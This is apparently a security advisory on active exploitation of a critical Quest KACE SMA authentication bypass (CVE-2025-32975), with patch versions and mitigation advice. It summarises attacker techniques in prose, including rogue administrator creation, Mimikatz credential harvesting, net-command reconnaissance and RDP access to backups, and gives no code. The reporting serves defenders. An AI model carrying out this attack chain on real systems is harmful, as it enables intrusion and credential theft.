Cybersecurity researchers have confirmed that threat actors are actively exploiting a severe authentication bypass vulnerability in unpatched Quest KACE Systems Management Appliance (SMA) devices, putting administrative accounts at risk.
The vulnerability, tracked as CVE-2025-32975 and rated with a CVSS score of 10.0, allows attackers to impersonate legitimate users without valid credentials. Exploiting this flaw could enable full administrative control over affected SMA systems. While Quest released patches in May 2025, many internet-exposed SMA instances remain vulnerable.
According to cybersecurity firm Arctic Wolf, suspicious activity began appearing in customer environments during the week of March 9, 2026. Observed actions suggest attackers are leveraging the flaw to execute remote commands, drop malicious Base64-encoded payloads from external servers, and gain persistent access.
The attack methodology includes:
- Creating additional administrative accounts via
runkbot.exe, a background process of the SMA Agent.
- Registry modifications and PowerShell scripts for persistence or system configuration changes.
- Credential harvesting using tools such as Mimikatz.
- Discovery and reconnaissance through enumeration of logged-in users, administrators, and execution of commands like
net time and net group.
- Accessing backup infrastructure (Veeam, Veritas) and domain controllers via Remote Desktop Protocol (RDP).
Arctic Wolf and other security experts warn that SMA systems exposed to the internet are particularly at risk. Administrators are urged to immediately apply the latest Quest patches:
- Version 13.0.385
- Version 13.1.81
- Version 13.2.183
- Version 14.0.341 (Patch 5)
- Version 14.1.101 (Patch 4)
Exposing SMA instances to the internet without proper mitigation significantly increases the likelihood of compromise.
This incident highlights the ongoing risks posed by unpatched enterprise management systems and the critical importance of timely vulnerability management. Organizations using Quest KACE SMA are strongly advised to validate patch deployment and review administrative account security to prevent unauthorized access.
